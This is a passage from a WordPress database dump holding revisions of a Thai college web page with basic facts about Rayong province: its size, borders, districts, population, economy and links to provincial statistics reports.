/>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:25:56', '2018-01-29 09:25:56', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(841, 3, '2018-01-29 16:29:20', '2018-01-29 09:29:20', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://www.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดาระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://www.rayong.go.th/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://www.rayong.go.th/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:29:20', '2018-01-29 09:29:20', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(842, 3, '2018-01-29 16:37:13', '2018-01-29 09:37:13', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img 